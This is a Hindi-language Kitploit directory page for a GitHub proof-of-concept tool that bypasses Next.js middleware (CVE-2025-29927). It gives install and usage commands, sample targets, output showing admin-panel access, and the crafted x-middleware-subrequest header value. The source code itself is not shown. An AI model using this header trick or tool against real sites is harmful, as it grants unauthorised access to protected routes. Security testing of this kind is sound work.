Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-for-Next.js-Middleware — > 🔓 एक काल्पनिक Next.js मिडलवेयर बाईपास (CVE-2025-29927) के लिए प्रूफ-ऑफ-कॉन्सेप्ट — संरक्षित रूट्स का परीक्षण करने के लिए सब-रिक्वेस्ट तैयार करें। | Kitploit
उपकरण/GitHubGitHub/m2hcz/poc-for-next.js-middleware
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 एक काल्पनिक Next.js मिडलवेयर बाईपास (CVE-2025-29927) के लिए प्रूफ-ऑफ-कॉन्सेप्ट — संरक्षित रूट्स का परीक्षण करने के लिए सब-रिक्वेस्ट तैयार करें।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
11 साल पहलेअभी तक समीक्षित नहीं

Next.js मिडलवेयर बायपास के लिए PoC (CVE-2025-29927)

Python Version Status

यह एक proof-of-concept है जो काल्पनिक Next.js मिडलवेयर बायपास भेद्यता (CVE-2025-29927) के लिए है। इसे केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए उपयोग करें।


🚀 विशेषताएँ

विशेषताविवरण
✨ रंग और वर्बोज़रंग-कोडित आउटपुट; विस्तृत डिबग लॉग के लिए -v।
📦 OOP संरचनास्पष्टता और रखरखाव के लिए क्लास-आधारित डिज़ाइन।
🌐 प्रॉक्सी समर्थन--proxy के माध्यम से HTTP(S) प्रॉक्सी के जरिए ट्रैफ़िक रूट करें।
🍪 सत्र प्रबंधनकुकीज़ और कनेक्शन पुन: उपयोग के लिए लगातार requests.Session।
🚦 रीडायरेक्ट नियंत्रणडिफ़ॉल्ट रूप से नो-फॉलो-रीडायरेक्ट; पास बनाम असफल को स्पष्ट रूप से पहचानता है।
🛠 कस्टम हेडरUser-Agent, x-middleware-subrequest को ओवरराइड करें, या हेडर जोड़ें।

⚡ इंस्टॉलेशन

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

आवश्यक Python 3.7+


🎯 उपयोग

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 उदाहरण

1. बुनियादी परीक्षण

root@kitploit:~
python poc.py localhost:3000

2. HTTPS और कस्टम पथ

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. प्रॉक्सी और वर्बोज़

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ अपेक्षित आउटपुट

सफलता

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

विफलता

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
टूल डाउनलोड करें
विकल्पविवरण
-p, --path PATHसंरक्षित रूट पथ (डिफ़ॉल्ट: /admin)
-s, --scheme {http,https}प्रोटोकॉल (डिफ़ॉल्ट: http)
--header HEADERx-middleware-subrequest हेडर मान (डिफ़ॉल्ट: middleware:middleware)
-ua, --user-agent AGENTकस्टम User-Agent (डिफ़ॉल्ट: Mozilla/5.0)
--proxy PROXYHTTP(S) प्रॉक्सी URL (उदा., http://127.0.0.1:8080)
-v, --verboseडिबग आउटपुट सक्षम करें
-h, --helpयह सहायता संदेश दिखाएँ